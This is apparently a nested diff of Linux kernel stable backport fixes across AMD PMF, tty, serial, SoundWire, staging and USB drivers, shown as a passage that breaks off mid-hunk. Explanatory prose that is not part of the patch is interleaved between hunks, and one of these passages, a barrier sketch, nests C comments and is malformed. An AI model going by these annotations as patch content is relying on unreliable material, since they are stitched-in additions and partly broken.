+diff --git a/drivers/platform/x86/amd/pmf/sps.c b/drivers/platform/x86/amd/pmf/sps.c
+index bed762d47a14a..fd448844de206 100644
+--- a/drivers/platform/x86/amd/pmf/sps.c
++++ b/drivers/platform/x86/amd/pmf/sps.c
+@@ -119,14 +119,77 @@ int amd_pmf_get_pprof_modes(struct amd_pmf_dev *pmf)
+ 	return mode;
+ }
+ 
++int amd_pmf_power_slider_update_event(struct amd_pmf_dev *dev)
++{
++	u8 mode, flag = 0;
++	int src;
++
++	mode = amd_pmf_get_pprof_modes(dev);
++	if (mode < 0)
++		return mode;
++
++	src = amd_pmf_get_power_source();
++
++	if (src == POWER_SOURCE_AC) {
++		switch (mode) {
++		case POWER_MODE_PERFORMANCE:
++			flag |= BIT(AC_BEST_PERF);
++			break;
++		case POWER_MODE_BALANCED_POWER:
++			flag |= BIT(AC_BETTER_PERF);
++			break;
++		case POWER_MODE_POWER_SAVER:
++			flag |= BIT(AC_BETTER_BATTERY);
++			break;
++		default:
++			dev_err(dev->dev, "unsupported platform profile\n");
++			return -EOPNOTSUPP;
++		}
++
++	} else if (src == POWER_SOURCE_DC) {
++		switch (mode) {
++		case POWER_MODE_PERFORMANCE:
++			flag |= BIT(DC_BEST_PERF);
++			break;
++		case POWER_MODE_BALANCED_POWER:
++			flag |= BIT(DC_BETTER_PERF);
++			break;
++		case POWER_MODE_POWER_SAVER:
++			flag |= BIT(DC_BATTERY_SAVER);
++			break;
++		default:
++			dev_err(dev->dev, "unsupported platform profile\n");
++			return -EOPNOTSUPP;
++		}
++	}
++
++	apmf_os_power_slider_update(dev, flag);
++
++	return 0;
++}
++
+ static int amd_pmf_profile_set(struct platform_profile_handler *pprof,
+ 			       enum platform_profile_option profile)
+ {
+ 	struct amd_pmf_dev *pmf = container_of(pprof, struct amd_pmf_dev, pprof);
++	int ret = 0;
+ 
+ 	pmf->current_profile = profile;
+ 
+-	return amd_pmf_set_sps_power_limits(pmf);
++	/* Notify EC about the slider position change */
++	if (is_apmf_func_supported(pmf, APMF_FUNC_OS_POWER_SLIDER_UPDATE)) {
++		ret = amd_pmf_power_slider_update_event(pmf);
++		if (ret)
++			return ret;
++	}
++
++	if (is_apmf_func_supported(pmf, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++		ret = amd_pmf_set_sps_power_limits(pmf);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
+ }
+ 
+ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+@@ -134,10 +197,13 @@ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+ 	int err;
+ 
+ 	dev->current_profile = PLATFORM_PROFILE_BALANCED;
+-	amd_pmf_load_defaults_sps(dev);
+ 
+-	/* update SPS balanced power mode thermals */
+-	amd_pmf_set_sps_power_limits(dev);
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++		amd_pmf_load_defaults_sps(dev);
++
++		/* update SPS balanced power mode thermals */
++		amd_pmf_set_sps_power_limits(dev);
++	}
+ 
+ 	dev->pprof.profile_get = amd_pmf_profile_get;
+ 	dev->pprof.profile_set = amd_pmf_profile_set;
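For reference, the slider event built above is a one-hot bitmask over the AC_*/DC_* positions defined in pmf.h: best performance on AC is reported as BIT(AC_BEST_PERF) = BIT(4) = 0x10, battery saver on DC as BIT(DC_BATTERY_SAVER) = BIT(3) = 0x08, and so on.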
+diff --git a/drivers/platform/x86/msi-laptop.c b/drivers/platform/x86/msi-laptop.c
+index 6b18ec543ac3a..f4c6c36e05a52 100644
+--- a/drivers/platform/x86/msi-laptop.c
++++ b/drivers/platform/x86/msi-laptop.c
+@@ -208,7 +208,7 @@ static ssize_t set_device_state(const char *buf, size_t count, u8 mask)
+ 		return -EINVAL;
+ 
+ 	if (quirks->ec_read_only)
+-		return -EOPNOTSUPP;
++		return 0;
+ 
+ 	/* read current device state */
+ 	result = ec_read(MSI_STANDARD_EC_COMMAND_ADDRESS, &rdata);
+@@ -838,15 +838,15 @@ static bool msi_laptop_i8042_filter(unsigned char data, unsigned char str,
+ static void msi_init_rfkill(struct work_struct *ignored)
+ {
+ 	if (rfk_wlan) {
+-		rfkill_set_sw_state(rfk_wlan, !wlan_s);
++		msi_rfkill_set_state(rfk_wlan, !wlan_s);
+ 		rfkill_wlan_set(NULL, !wlan_s);
+ 	}
+ 	if (rfk_bluetooth) {
+-		rfkill_set_sw_state(rfk_bluetooth, !bluetooth_s);
++		msi_rfkill_set_state(rfk_bluetooth, !bluetooth_s);
+ 		rfkill_bluetooth_set(NULL, !bluetooth_s);
+ 	}
+ 	if (rfk_threeg) {
+-		rfkill_set_sw_state(rfk_threeg, !threeg_s);
++		msi_rfkill_set_state(rfk_threeg, !threeg_s);
+ 		rfkill_threeg_set(NULL, !threeg_s);
+ 	}
+ }
+diff --git a/drivers/s390/block/dasd_3990_erp.c b/drivers/s390/block/dasd_3990_erp.c
+index 81d283b3cd3bd..d030fe2e29643 100644
+--- a/drivers/s390/block/dasd_3990_erp.c
++++ b/drivers/s390/block/dasd_3990_erp.c
+@@ -1050,7 +1050,7 @@ dasd_3990_erp_com_rej(struct dasd_ccw_req * erp, char *sense)
+ 		dev_err(&device->cdev->dev, "An I/O request was rejected"
+ 			" because writing is inhibited\n");
+ 		erp = dasd_3990_erp_cleanup(erp, DASD_CQR_FAILED);
+-	} else if (sense[7] & SNS7_INVALID_ON_SEC) {
++	} else if (sense[7] == SNS7_INVALID_ON_SEC) {
+ 		dev_err(&device->cdev->dev, "An I/O request was rejected on a copy pair secondary device\n");
+ 		/* suppress dump of sense data for this error */
+ 		set_bit(DASD_CQR_SUPPRESS_CR, &erp->refers->flags);
+diff --git a/drivers/s390/block/dasd_ioctl.c b/drivers/s390/block/dasd_ioctl.c
+index 8fca725b3daec..87890b6efcdcf 100644
+--- a/drivers/s390/block/dasd_ioctl.c
++++ b/drivers/s390/block/dasd_ioctl.c
+@@ -131,6 +131,7 @@ static int dasd_ioctl_resume(struct dasd_block *block)
+ 	spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 
+ 	dasd_schedule_block_bh(block);
++	dasd_schedule_device_bh(base);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/soundwire/bus.c b/drivers/soundwire/bus.c
+index 4fd221d0cc818..f7b3e6a6975b4 100644
+--- a/drivers/soundwire/bus.c
++++ b/drivers/soundwire/bus.c
+@@ -884,8 +884,8 @@ static void sdw_modify_slave_status(struct sdw_slave *slave,
+ 			"initializing enumeration and init completion for Slave %d\n",
+ 			slave->dev_num);
+ 
+-		init_completion(&slave->enumeration_complete);
+-		init_completion(&slave->initialization_complete);
++		reinit_completion(&slave->enumeration_complete);
++		reinit_completion(&slave->initialization_complete);
+ 
+ 	} else if ((status == SDW_SLAVE_ATTACHED) &&
+ 		   (slave->status == SDW_SLAVE_UNATTACHED)) {
+@@ -893,7 +893,7 @@ static void sdw_modify_slave_status(struct sdw_slave *slave,
+ 			"signaling enumeration completion for Slave %d\n",
+ 			slave->dev_num);
+ 
+-		complete(&slave->enumeration_complete);
++		complete_all(&slave->enumeration_complete);
+ 	}
+ 	slave->status = status;
+ 	mutex_unlock(&bus->bus_lock);
+@@ -1916,7 +1916,7 @@ int sdw_handle_slave_status(struct sdw_bus *bus,
+ 				"signaling initialization completion for Slave %d\n",
+ 				slave->dev_num);
+ 
+-			complete(&slave->initialization_complete);
++			complete_all(&slave->initialization_complete);
+ 
+ 			/*
+ 			 * If the manager became pm_runtime active, the peripherals will be
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 08934d27f709e..a51c8a670d38a 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -434,7 +434,7 @@ static int qcom_swrm_get_alert_slave_dev_num(struct qcom_swrm_ctrl *ctrl)
+ 		status = (val >> (dev_num * SWRM_MCP_SLV_STATUS_SZ));
+ 
+ 		if ((status & SWRM_MCP_SLV_STATUS_MASK) == SDW_SLAVE_ALERT) {
+-			ctrl->status[dev_num] = status;
++			ctrl->status[dev_num] = status & SWRM_MCP_SLV_STATUS_MASK;
+ 			return dev_num;
+ 		}
+ 	}
+diff --git a/drivers/staging/ks7010/ks_wlan_net.c b/drivers/staging/ks7010/ks_wlan_net.c
+index 7e8d37c169f0f..f389e227aefb9 100644
+--- a/drivers/staging/ks7010/ks_wlan_net.c
++++ b/drivers/staging/ks7010/ks_wlan_net.c
+@@ -1584,8 +1584,10 @@ static int ks_wlan_set_encode_ext(struct net_device *dev,
+ 			commit |= SME_WEP_FLAG;
+ 		}
+ 		if (enc->key_len) {
+-			memcpy(&key->key_val[0], &enc->key[0], enc->key_len);
+-			key->key_len = enc->key_len;
++			int key_len = clamp_val(enc->key_len, 0, IW_ENCODING_TOKEN_MAX);
++
++			memcpy(&key->key_val[0], &enc->key[0], key_len);
++			key->key_len = key_len;
+ 			commit |= (SME_WEP_VAL1 << index);
+ 		}
+ 		break;
+diff --git a/drivers/staging/media/atomisp/Kconfig b/drivers/staging/media/atomisp/Kconfig
+index 2c8d7fdcc5f7a..4881b6ea5237e 100644
+--- a/drivers/staging/media/atomisp/Kconfig
++++ b/drivers/staging/media/atomisp/Kconfig
+@@ -13,6 +13,7 @@ config VIDEO_ATOMISP
+ 	tristate "Intel Atom Image Signal Processor Driver"
+ 	depends on VIDEO_DEV && INTEL_ATOMISP
+ 	depends on PMIC_OPREGION
++	select V4L2_FWNODE
+ 	select IOSF_MBI
+ 	select VIDEOBUF_VMALLOC
+ 	select VIDEO_V4L2_SUBDEV_API
+diff --git a/drivers/staging/rtl8712/rtl871x_xmit.c b/drivers/staging/rtl8712/rtl871x_xmit.c
+index 090345bad2230..6353dbe554d3a 100644
+--- a/drivers/staging/rtl8712/rtl871x_xmit.c
++++ b/drivers/staging/rtl8712/rtl871x_xmit.c
+@@ -21,6 +21,7 @@
+ #include "osdep_intf.h"
+ #include "usb_ops.h"
+ 
++#include <linux/usb.h>
+ #include <linux/ieee80211.h>
+ 
+ static const u8 P802_1H_OUI[P80211_OUI_LEN] = {0x00, 0x00, 0xf8};
+@@ -55,6 +56,7 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 	sint i;
+ 	struct xmit_buf *pxmitbuf;
+ 	struct xmit_frame *pxframe;
++	int j;
+ 
+ 	memset((unsigned char *)pxmitpriv, 0, sizeof(struct xmit_priv));
+ 	spin_lock_init(&pxmitpriv->lock);
+@@ -117,11 +119,8 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 	_init_queue(&pxmitpriv->pending_xmitbuf_queue);
+ 	pxmitpriv->pallocated_xmitbuf =
+ 		kmalloc(NR_XMITBUFF * sizeof(struct xmit_buf) + 4, GFP_ATOMIC);
+-	if (!pxmitpriv->pallocated_xmitbuf) {
+-		kfree(pxmitpriv->pallocated_frame_buf);
+-		pxmitpriv->pallocated_frame_buf = NULL;
+-		return -ENOMEM;
+-	}
++	if (!pxmitpriv->pallocated_xmitbuf)
++		goto clean_up_frame_buf;
+ 	pxmitpriv->pxmitbuf = pxmitpriv->pallocated_xmitbuf + 4 -
+ 			      ((addr_t)(pxmitpriv->pallocated_xmitbuf) & 3);
+ 	pxmitbuf = (struct xmit_buf *)pxmitpriv->pxmitbuf;
+@@ -129,13 +128,17 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 		INIT_LIST_HEAD(&pxmitbuf->list);
+ 		pxmitbuf->pallocated_buf =
+ 			kmalloc(MAX_XMITBUF_SZ + XMITBUF_ALIGN_SZ, GFP_ATOMIC);
+-		if (!pxmitbuf->pallocated_buf)
+-			return -ENOMEM;
++		if (!pxmitbuf->pallocated_buf) {
++			j = 0;
++			goto clean_up_alloc_buf;
++		}
+ 		pxmitbuf->pbuf = pxmitbuf->pallocated_buf + XMITBUF_ALIGN_SZ -
+ 				 ((addr_t) (pxmitbuf->pallocated_buf) &
+ 				 (XMITBUF_ALIGN_SZ - 1));
+-		if (r8712_xmit_resource_alloc(padapter, pxmitbuf))
+-			return -ENOMEM;
++		if (r8712_xmit_resource_alloc(padapter, pxmitbuf)) {
++			j = 1;
++			goto clean_up_alloc_buf;
++		}
+ 		list_add_tail(&pxmitbuf->list,
+ 				 &(pxmitpriv->free_xmitbuf_queue.queue));
+ 		pxmitbuf++;
+@@ -146,6 +149,28 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 	init_hwxmits(pxmitpriv->hwxmits, pxmitpriv->hwxmit_entry);
+ 	tasklet_setup(&pxmitpriv->xmit_tasklet, r8712_xmit_bh);
+ 	return 0;
++
++clean_up_alloc_buf:
++	if (j) {
++		/* failure happened in r8712_xmit_resource_alloc(),
++		 * so delete the extra pxmitbuf->pallocated_buf
++		 */
++		kfree(pxmitbuf->pallocated_buf);
++	}
++	for (j = 0; j < i; j++) {
++		int k;
++
++		pxmitbuf--;			/* reset pointer */
++		kfree(pxmitbuf->pallocated_buf);
++		for (k = 0; k < 8; k++)		/* delete xmit urb's */
++			usb_free_urb(pxmitbuf->pxmit_urb[k]);
++	}
++	kfree(pxmitpriv->pallocated_xmitbuf);
++	pxmitpriv->pallocated_xmitbuf = NULL;
++clean_up_frame_buf:
++	kfree(pxmitpriv->pallocated_frame_buf);
++	pxmitpriv->pallocated_frame_buf = NULL;
++	return -ENOMEM;
+ }
+ 
+ void _free_xmit_priv(struct xmit_priv *pxmitpriv)
+diff --git a/drivers/staging/rtl8712/xmit_linux.c b/drivers/staging/rtl8712/xmit_linux.c
+index 132afbf49dde9..ceb6b590b310f 100644
+--- a/drivers/staging/rtl8712/xmit_linux.c
++++ b/drivers/staging/rtl8712/xmit_linux.c
+@@ -112,6 +112,12 @@ int r8712_xmit_resource_alloc(struct _adapter *padapter,
+ 	for (i = 0; i < 8; i++) {
+ 		pxmitbuf->pxmit_urb[i] = usb_alloc_urb(0, GFP_KERNEL);
+ 		if (!pxmitbuf->pxmit_urb[i]) {
++			int k;
++
++			for (k = i - 1; k >= 0; k--) {
++				/* handle allocation errors partway through the loop */
++				usb_free_urb(pxmitbuf->pxmit_urb[k]);
++			}
+ 			netdev_err(padapter->pnetdev, "pxmitbuf->pxmit_urb[i] == NULL\n");
+ 			return -ENOMEM;
+ 		}
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index b6e0cc4571eac..59a559366b614 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2508,8 +2508,10 @@ static void gsm_cleanup_mux(struct gsm_mux *gsm, bool disc)
+ 		gsm->has_devices = false;
+ 	}
+ 	for (i = NUM_DLCI - 1; i >= 0; i--)
+-		if (gsm->dlci[i])
++		if (gsm->dlci[i]) {
+ 			gsm_dlci_release(gsm->dlci[i]);
++			gsm->dlci[i] = NULL;
++		}
+ 	mutex_unlock(&gsm->mutex);
+ 	/* Now wipe the queues */
+ 	tty_ldisc_flush(gsm->tty);
+diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
+index 597019690ae62..4dff2f34e2d06 100644
+--- a/drivers/tty/n_tty.c
++++ b/drivers/tty/n_tty.c
+@@ -204,8 +204,8 @@ static void n_tty_kick_worker(struct tty_struct *tty)
+ 	struct n_tty_data *ldata = tty->disc_data;
+ 
+ 	/* Did the input worker stop? Restart it */
+-	if (unlikely(ldata->no_room)) {
+-		ldata->no_room = 0;
++	if (unlikely(READ_ONCE(ldata->no_room))) {
++		WRITE_ONCE(ldata->no_room, 0);
+ 
+ 		WARN_RATELIMIT(tty->port->itty == NULL,
+ 				"scheduling with invalid itty\n");
+@@ -1698,7 +1698,7 @@ n_tty_receive_buf_common(struct tty_struct *tty, const unsigned char *cp,
+ 			if (overflow && room < 0)
+ 				ldata->read_head--;
+ 			room = overflow;
+-			ldata->no_room = flow && !room;
++			WRITE_ONCE(ldata->no_room, flow && !room);
+ 		} else
+ 			overflow = 0;
+ 
+@@ -1729,6 +1729,17 @@ n_tty_receive_buf_common(struct tty_struct *tty, const unsigned char *cp,
+ 	} else
+ 		n_tty_check_throttle(tty);
+ 
++	if (unlikely(ldata->no_room)) {
++		/*
++		 * The barrier here ensures that chars_in_buffer() reads the
++		 * latest read_tail and that read_tail is not loaded before
++		 * ldata->no_room is set.
++		 */
++		smp_mb();
++		if (!chars_in_buffer(tty))
++			n_tty_kick_worker(tty);
++	}
++
+ 	up_read(&tty->termios_rwsem);
+ 
+ 	return rcvd;
+@@ -2130,7 +2141,7 @@ static ssize_t n_tty_read(struct tty_struct *tty, struct file *file,
+ 	ssize_t retval = 0;
+ 	long timeout;
+ 	bool packet;
+-	size_t tail;
++	size_t old_tail;
+ 
+ 	/*
+ 	 * Is this a continuation of a read started earlier?
+@@ -2193,7 +2204,7 @@ static ssize_t n_tty_read(struct tty_struct *tty, struct file *file,
+ 	}
+ 
+ 	packet = tty->ctrl.packet;
+-	tail = ldata->read_tail;
++	old_tail = ldata->read_tail;
+ 
+ 	add_wait_queue(&tty->read_wait, &wait);
+ 	while (nr) {
+@@ -2282,8 +2293,14 @@ more_to_be_read:
+ 		if (time)
+ 			timeout = time;
+ 	}
+-	if (tail != ldata->read_tail)
++	if (old_tail != ldata->read_tail) {
++		/*
++		 * Make sure no_room is not read in n_tty_kick_worker()
++		 * before setting ldata->read_tail in copy_from_read_buf().
++		 */
++		smp_mb();
+ 		n_tty_kick_worker(tty);
++	}
+ 	up_read(&tty->termios_rwsem);
+ 
+ 	remove_wait_queue(&tty->read_wait, &wait);
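The two smp_mb() calls added above pair with each other across the reader and the receive path; stripped to its essentials the ordering is (an illustrative sketch, not part of the patch):

    /*
     * CPU0: n_tty_read()              CPU1: n_tty_receive_buf_common()
     *
     *   ldata->read_tail = new tail;    WRITE_ONCE(ldata->no_room, 1);
     *   smp_mb();                       smp_mb();
     *   if (READ_ONCE(no_room))         if (!chars_in_buffer())  /* loads read_tail */
     *           n_tty_kick_worker();            n_tty_kick_worker();
     */

With full barriers on both sides, at least one CPU is guaranteed to observe the other's store, so the stalled flip-buffer work is always restarted; without them, both sides could read stale values and the worker would never be kicked.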
+diff --git a/drivers/tty/serial/8250/8250_dwlib.c b/drivers/tty/serial/8250/8250_dwlib.c
+index 75f32f054ebb1..84843e204a5e8 100644
+--- a/drivers/tty/serial/8250/8250_dwlib.c
++++ b/drivers/tty/serial/8250/8250_dwlib.c
+@@ -244,7 +244,7 @@ void dw8250_setup_port(struct uart_port *p)
+ 	struct dw8250_port_data *pd = p->private_data;
+ 	struct dw8250_data *data = to_dw8250_data(pd);
+ 	struct uart_8250_port *up = up_to_u8250p(p);
+-	u32 reg;
++	u32 reg, old_dlf;
+ 
+ 	pd->hw_rs485_support = dw8250_detect_rs485_hw(p);
+ 	if (pd->hw_rs485_support) {
+@@ -270,9 +270,11 @@ void dw8250_setup_port(struct uart_port *p)
+ 	dev_dbg(p->dev, "Designware UART version %c.%c%c\n",
+ 		(reg >> 24) & 0xff, (reg >> 16) & 0xff, (reg >> 8) & 0xff);
+ 
++	/* Preserve the value written by firmware or bootloader */
++	old_dlf = dw8250_readl_ext(p, DW_UART_DLF);
+ 	dw8250_writel_ext(p, DW_UART_DLF, ~0U);
+ 	reg = dw8250_readl_ext(p, DW_UART_DLF);
+-	dw8250_writel_ext(p, DW_UART_DLF, 0);
++	dw8250_writel_ext(p, DW_UART_DLF, old_dlf);
+ 
+ 	if (reg) {
+ 		pd->dlf_size = fls(reg);
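The DLF change is the usual save/probe/restore idiom for sizing a register without clobbering what firmware programmed into it (a generic sketch with hypothetical accessors):

    u32 old = read_reg(DLF);        /* preserve the firmware value        */
    write_reg(DLF, ~0U);            /* try to set every bit               */
    width = fls(read_reg(DLF));     /* readback reveals the writable bits */
    write_reg(DLF, old);            /* restore instead of writing zero    */

The old code wrote zero back, discarding any fractional divisor the bootloader had set up, which can break an already-configured console until the port is reprogrammed.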
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index cf9dc2ddfe664..6f6c4e9b77435 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -1495,13 +1495,6 @@ static int qcom_geni_serial_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/*
+-	 * Set pm_runtime status as ACTIVE so that wakeup_irq gets
+-	 * enabled/disabled from dev_pm_arm_wake_irq during system
+-	 * suspend/resume respectively.
+-	 */
+-	pm_runtime_set_active(&pdev->dev);
+-
+ 	if (port->wakeup_irq > 0) {
+ 		device_init_wakeup(&pdev->dev, true);
+ 		ret = dev_pm_set_dedicated_wake_irq(&pdev->dev,
+diff --git a/drivers/tty/serial/sifive.c b/drivers/tty/serial/sifive.c
+index 7fb6760b5c37a..2affd1351ae73 100644
+--- a/drivers/tty/serial/sifive.c
++++ b/drivers/tty/serial/sifive.c
+@@ -832,7 +832,7 @@ static void sifive_serial_console_write(struct console *co, const char *s,
+ 	local_irq_restore(flags);
+ }
+ 
+-static int __init sifive_serial_console_setup(struct console *co, char *options)
++static int sifive_serial_console_setup(struct console *co, char *options)
+ {
+ 	struct sifive_serial_port *ssp;
+ 	int baud = SIFIVE_DEFAULT_BAUD_RATE;
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index 1dcadef933e3a..69a44bd7e5d02 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -3012,12 +3012,14 @@ static int cdns3_gadget_udc_stop(struct usb_gadget *gadget)
+ static int cdns3_gadget_check_config(struct usb_gadget *gadget)
+ {
+ 	struct cdns3_device *priv_dev = gadget_to_cdns3_device(gadget);
++	struct cdns3_endpoint *priv_ep;
+ 	struct usb_ep *ep;
+ 	int n_in = 0;
+ 	int total;
+ 
+ 	list_for_each_entry(ep, &gadget->ep_list, ep_list) {
+-		if (ep->claimed && (ep->address & USB_DIR_IN))
++		priv_ep = ep_to_cdns3_ep(ep);
++		if ((priv_ep->flags & EP_CLAIMED) && (ep->address & USB_DIR_IN))
+ 			n_in++;
+ 	}
+ 
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index 934b3d997702e..15e9bd180a1d2 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -436,6 +436,10 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 	/* novation SoundControl XL */
+ 	{ USB_DEVICE(0x1235, 0x0061), .driver_info = USB_QUIRK_RESET_RESUME },
+ 
++	/* Focusrite Scarlett Solo USB */
++	{ USB_DEVICE(0x1235, 0x8211), .driver_info =
++			USB_QUIRK_DISCONNECT_SUSPEND },
++
+ 	/* Huawei 4G LTE module */
+ 	{ USB_DEVICE(0x12d1, 0x15bb), .driver_info =
+ 			USB_QUIRK_DISCONNECT_SUSPEND },
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index e999e6079ae03..3ee70ffaf0035 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -277,9 +277,9 @@ int dwc3_core_soft_reset(struct dwc3 *dwc)
+ 	/*
+ 	 * We're resetting only the device side because, if we're in host mode,
+ 	 * XHCI driver will reset the host block. If dwc3 was configured for
+-	 * host-only mode, then we can return early.
++	 * host-only mode or current role is host, then we can return early.
+ 	 */
+-	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
++	if (dwc->dr_mode == USB_DR_MODE_HOST || dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
+ 		return 0;
+ 
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+@@ -1241,22 +1241,6 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 		dwc3_writel(dwc->regs, DWC3_GUCTL1, reg);
+ 	}
+ 
+-	if (dwc->dr_mode == USB_DR_MODE_HOST ||
+-	    dwc->dr_mode == USB_DR_MODE_OTG) {
+-		reg = dwc3_readl(dwc->regs, DWC3_GUCTL);
+-
+-		/*
+-		 * Enable Auto retry Feature to make the controller operating in
+-		 * Host mode on seeing transaction errors(CRC errors or internal
+-		 * overrun scenerios) on IN transfers to reply to the device
+-		 * with a non-terminating retry ACK (i.e, an ACK transcation
+-		 * packet with Retry=1 & Nump != 0)
+-		 */
+-		reg |= DWC3_GUCTL_HSTINAUTORETRY;
+-
+-		dwc3_writel(dwc->regs, DWC3_GUCTL, reg);
+-	}
+-
+ 	/*
+ 	 * Must config both number of packets and max burst settings to enable
+ 	 * RX and/or TX threshold.
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index bb57bc9bc17cb..80cc532ba9d55 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -254,9 +254,6 @@
+ #define DWC3_GCTL_GBLHIBERNATIONEN	BIT(1)
+ #define DWC3_GCTL_DSBLCLKGTNG		BIT(0)
+ 
+-/* Global User Control Register */
+-#define DWC3_GUCTL_HSTINAUTORETRY	BIT(14)
+-
+ /* Global User Control 1 Register */
+ #define DWC3_GUCTL1_DEV_DECOUPLE_L1L2_EVT	BIT(31)
+ #define DWC3_GUCTL1_TX_IPGAP_LINECHECK_DIS	BIT(28)
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index 560793545362a..ae25ee832ec03 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -233,10 +233,12 @@ static int dwc3_pci_quirks(struct dwc3_pci *dwc,
+ 
+ 			/*
+ 			 * A lot of BYT devices lack ACPI resource entries for
+-			 * the GPIOs, add a fallback mapping to the reference
++			 * the GPIOs. If the ACPI entry for the GPIO controller
++			 * is present, add a fallback mapping to the reference
+ 			 * design GPIOs which all boards seem to use.
+ 			 */
+-			gpiod_add_lookup_table(&platform_bytcr_gpios);
++			if (acpi_dev_present("INT33FC", NULL, -1))
++				gpiod_add_lookup_table(&platform_bytcr_gpios);
+ 
+ 			/*
+ 			 * These GPIOs will turn on the USB2 PHY. Note that we have to
+diff --git a/drivers/usb/gadget/composite.c b/drivers/usb/gadget/composite.c
+index 403563c06477b..cb0a4e2cdbb73 100644
+--- a/drivers/usb/gadget/composite.c
++++ b/drivers/usb/gadget/composite.c
+@@ -1029,6 +1029,10 @@ int usb_add_config(struct usb_composite_dev *cdev,
+ 		goto done;
+ 
+ 	status = bind(config);
++
++	if (status == 0)
++		status = usb_gadget_check_config(cdev->gadget);
++
+ 	if (status < 0) {
+ 		while (!list_empty(&config->functions)) {
+ 			struct usb_function		*f;
+diff --git a/drivers/usb/gadget/legacy/raw_gadget.c b/drivers/usb/gadget/legacy/raw_gadget.c
+index 2acece16b8900..e549022642e56 100644
+--- a/drivers/usb/gadget/legacy/raw_gadget.c
++++ b/drivers/usb/gadget/legacy/raw_gadget.c
+@@ -310,13 +310,15 @@ static int gadget_bind(struct usb_gadget *gadget,
+ 	dev->eps_num = i;
+ 	spin_unlock_irqrestore(&dev->lock, flags);
+ 
+-	/* Matches kref_put() in gadget_unbind(). */
+-	kref_get(&dev->count);
+-
+ 	ret = raw_queue_event(dev, USB_RAW_EVENT_CONNECT, 0, NULL);
+-	if (ret < 0)
++	if (ret < 0) {
+ 		dev_err(&gadget->dev, "failed to queue event\n");
++		set_gadget_data(gadget, NULL);
++		return ret;
++	}
+ 
++	/* Matches kref_put() in gadget_unbind(). */
++	kref_get(&dev->count);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 99f40611f459b..139f471894fb5 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -851,7 +851,6 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 */
+ 	if (gadget->connected)
+ 		ret = usb_gadget_connect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
+ 
+ unlock:
+ 	mutex_unlock(&gadget->udc->connect_lock);
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index 3c7ffb35c35cd..a8cadc45c65aa 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -3695,15 +3695,15 @@ static int tegra_xudc_powerdomain_init(struct tegra_xudc *xudc)
+ 	int err;
+ 
+ 	xudc->genpd_dev_device = dev_pm_domain_attach_by_name(dev, "dev");
+-	if (IS_ERR_OR_NULL(xudc->genpd_dev_device)) {
+-		err = PTR_ERR(xudc->genpd_dev_device) ? : -ENODATA;
++	if (IS_ERR(xudc->genpd_dev_device)) {
++		err = PTR_ERR(xudc->genpd_dev_device);
+ 		dev_err(dev, "failed to get device power domain: %d\n", err);
+ 		return err;
+ 	}
+ 
+ 	xudc->genpd_dev_ss = dev_pm_domain_attach_by_name(dev, "ss");
+-	if (IS_ERR_OR_NULL(xudc->genpd_dev_ss)) {
+-		err = PTR_ERR(xudc->genpd_dev_ss) ? : -ENODATA;
++	if (IS_ERR(xudc->genpd_dev_ss)) {
++		err = PTR_ERR(xudc->genpd_dev_ss);
+ 		dev_err(dev, "failed to get SuperSpeed power domain: %d\n", err);
+ 		return err;
+ 	}
+diff --git a/drivers/usb/host/ohci-at91.c b/drivers/usb/host/ohci-at91.c
+index 533537ef3c21d..360680769494b 100644
+--- a/drivers/usb/host/ohci-at91.c
++++ b/drivers/usb/host/ohci-at91.c
+@@ -673,7 +673,13 @@ ohci_hcd_at91_drv_resume(struct device *dev)
